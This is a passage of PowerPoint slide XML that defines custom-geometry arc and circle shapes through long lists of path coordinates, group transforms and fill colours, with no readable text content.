                    <a:pt x="1299310" y="602849"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1314609" y="644610"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1325805" y="687986"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1332683" y="732772"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1335023" y="778763"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1653540" y="778763"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1652026" y="731410"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1647543" y="684795"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1640179" y="639001"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1630020" y="594110"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1617155" y="550204"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1601669" y="507366"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1583651" y="465678"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1563189" y="425222"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1540368" y="386080"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1515278" y="348334"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1488004" y="312067"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1458635" y="277361"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1427257" y="244298"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1393959" y="212961"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1358826" y="183431"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1321948" y="155792"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1283410" y="130124"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1243301" y="106510"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1201708" y="85033"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1158718" y="65775"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1114418" y="48818"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1068896" y="34244"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1022238" y="22135"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="974534" y="12574"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="925869" y="5643"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="876331" y="1424"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="826007" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="0066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430523" y="3246119"/>
              <a:ext cx="1062355" cy="996950"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1062354" h="996950">
                  <a:moveTo>
                    <a:pt x="531113" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="482765" y="2036"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="435634" y="8029"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="389907" y="17802"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="345773" y="31180"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="303418" y="47985"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="263031" y="68043"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="224797" y="91177"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="188905" y="117212"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="155543" y="145970"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="124896" y="177277"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="97154" y="210956"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="72502" y="246831"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="51129" y="284727"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="33222" y="324466"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18968" y="365874"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8555" y="408774"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2170" y="452991"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="498347"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2170" y="543704"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8555" y="587921"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18968" y="630821"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="33222" y="672229"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="51129" y="711968"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="72502" y="749864"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="97154" y="785739"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="124896" y="819418"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="155543" y="850725"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="188905" y="879483"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="224797" y="905518"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="263031" y="928652"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="303418" y="948710"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="345773" y="965515"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="389907" y="978893"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="435634" y="988666"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="482765" y="994659"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="531113" y="996695"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="579462" y="994659"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="626593" y="988666"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="672320" y="978893"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="716454" y="965515"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="758809" y="948710"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="799196" y="928652"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="837430" y="905518"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="873322" y="879483"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="906684" y="850725"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="937331" y="819418"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="965073" y="785739"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="989725" y="749864"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1011098" y="711968"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1029005" y="672229"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1043259" y="630821"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1053672" y="587921"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1060057" y="543704"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1062227" y="498347"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1060057" y="452991"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1053672" y="408774"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1043259" y="365874"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1029005" y="324466"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1011098" y="284727"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="989725" y="246831"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="965073" y="210956"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="937331" y="177277"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="906684" y="145970"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="873322" y="117212"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="837430" y="91177"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="799196" y="68043"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="758809" y="47985"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="716454" y="31180"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="672320" y="17802"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="626593" y="8029"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="579462" y="2036"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="531113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37431" y="3628644"/>
              <a:ext cx="248412" cy="233171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7301483" y="2953511"/>
            <a:ext cx="1655445" cy="1275715"/>
            <a:chOff x="7301483" y="2953511"/>
            <a:chExt cx="1655445" cy="1275715"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="object 9"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7301483" y="2953511"/>
              <a:ext cx="1655445" cy="775970"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1655445" h="775970">
                  <a:moveTo>
                    <a:pt x="826770" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="776567" y="1421"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="727138" y="5630"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="678570" y="12545"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="630952" y="22082"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="584372" y="34160"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="538916" y="48696"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="494674" y="65608"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="451733" y="84813"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="410181" y="106228"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="370106" y="129771"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="331596" y="155361"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="294739" y="182913"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="259622" y="212346"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="226334" y="243578"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="194963" y="276525"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="165596" y="311106"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="138321" y="347238"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="113227" y="384838"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="90401" y="423824"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="69931" y="464114"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="51905" y="505625"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="36412" y="548274"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="23538" y="591980"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13372" y="636659"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6001" y="682230"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1515" y="728610"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="775715"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="318897" y="775715"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="321222" y="730067"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="328057" y="685593"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="339188" y="642501"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="354402" y="600995"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="373485" y="561281"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="396226" y="523564"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="422410" y="488049"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="451825" y="454942"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="484257" y="424449"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="519493" y="396773"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="557321" y="372122"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="597527" y="350699"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="639898" y="332711"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="684221" y="318363"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="730282" y="307860"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="777870" y="301408"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="826770" y="299212"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="875665" y="301408"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="923280" y="307860"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="969398" y="318363"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1013802" y="332711"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1056274" y="350699"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1096597" y="372122"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1134554" y="396773"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1169927" y="424449"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1202499" y="454942"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1232053" y="488049"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1258371" y="523564"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1281236" y="561281"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1300432" y="600995"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1315740" y="642501"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1326943" y="685593"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1333824" y="730067"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1336167" y="775715"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1655064" y="775715"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1653548" y="728610"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1649061" y="682230"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1641689" y="636659"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1631520" y="591980"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1618642" y="548274"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1603141" y="505625"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1585105" y="464114"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1564622" y="423824"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1541780" y="384838"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1516664" y="347238"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1489364" y="311106"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1459966" y="276525"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1428559" y="243578"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1395228" y="212346"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1360063" y="182913"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1323150" y="155361"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1284576" y="129771"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1244430" y="106228"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1202799" y="84813"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1159769" y="65608"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1115430" y="48696"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1069867" y="34160"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1023169" y="22082"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="975422" y="12545"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="926715" y="5630"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="877135" y="1421"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="826770" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="16BA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598663" y="3230879"/>
              <a:ext cx="1062355" cy="998219"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1062354" h="998220">
                  <a:moveTo>
                    <a:pt x="531113" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="482765" y="2040"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="435634" y="8043"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="389907" y="17832"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="345773" y="31232"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="303418" y="48065"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="263031" y="68156"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="224797" y="91328"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="188905" y="117404"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="155543" y="146208"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="124896" y="177564"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="97154" y="211296"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="72502" y="247226"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="51129" y="285179"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="33222" y="324978"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18968" y="366447"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8555" y="409410"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2170" y="453689"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="499110"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2170" y="544530"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8555" y="588809"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18968" y="631772"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="33222" y="673241"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="51129" y="713040"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="72502" y="750993"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="97154" y="786923"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="124896" y="820655"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="155543" y="852011"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="188905" y="880815"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="224797" y="906891"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="263031" y="930063"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="303418" y="950154"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="345773" y="966987"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="389907" y="980387"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="435634" y="990176"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="482765" y="996179"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="531113" y="998220"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="579462" y="996179"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="626593" y="990176"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="672320" y="980387"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="716454" y="966987"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="758809" y="950154"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="799196" y="930063"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="837430" y="906891"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="873322" y="880815"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="906684" y="852011"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="937331" y="820655"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="965073" y="786923"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="989725" y="750993"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1011098" y="713040"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1029005" y="673241"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1043259" y="631772"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1053672" y="588809"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1060057" y="544530"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1062227" y="499110"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1060057" y="453689"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1053672" y="409410"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1043259" y="366447"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1029005" y="324978"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1011098" y="285179"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="989725" y="247226"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="965073" y="211296"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="937331" y="177564"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="906684" y="146208"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="873322" y="117404"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="837430" y="91328"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="799196" y="68156"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="758809" y="48065"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="716454" y="31232"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="672320" y="17832"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="626593" y="8043"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="579462" y="2040"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="531113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05571" y="3613403"/>
              <a:ext cx="248411" cy="233172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11390376" y="2967227"/>
            <a:ext cx="1652270" cy="1275715"/>
            <a:chOff x="11390376" y="2967227"/>
            <a:chExt cx="1652270" cy="1275715"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13" name="object 13"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="11390376" y="2967227"/>
              <a:ext cx="1652270" cy="779145"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1652269" h="779145">
                  <a:moveTo>
                    <a:pt x="826007" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="775690" y="1424"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="726170" y="5643"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="677534" y="12574"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="629867" y="22135"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="583257" y="34244"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="537790" y="48818"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="493552" y="65775"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="450629" y="85033"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="409109" y="106510"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="369077" y="130124"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="330620" y="155792"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="293824" y="183431"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="258776" y="212961"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="225562" y="244298"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="194269" y="277361"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="164982" y="312067"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="137789" y="348334"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="112775" y="386079"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="90028" y="425222"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="69633" y="465678"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="51678" y="507366"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="36247" y="550204"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="23428" y="594110"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13308" y="639001"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5972" y="684795"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1507" y="731410"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="778763"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="318516" y="778763"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="320840" y="732772"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="327671" y="687986"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="338795" y="644610"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="354000" y="602849"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="373071" y="562906"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="395797" y="524985"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="421964" y="489291"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="451359" y="456028"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="483769" y="425400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="518981" y="397610"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="556781" y="372864"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="596956" y="351365"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="639294" y="333317"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="683581" y="318924"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="729605" y="308391"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="777151" y="301921"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="826007" y="299720"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="874864" y="301921"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="922410" y="308391"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="968434" y="318924"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1012721" y="333317"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1055059" y="351365"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1095234" y="372864"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1133034" y="397610"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1168246" y="425400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1200656" y="456028"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1230051" y="489291"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1256218" y="524985"/>
                  </a:lnTo>
                  <a:lnTo>
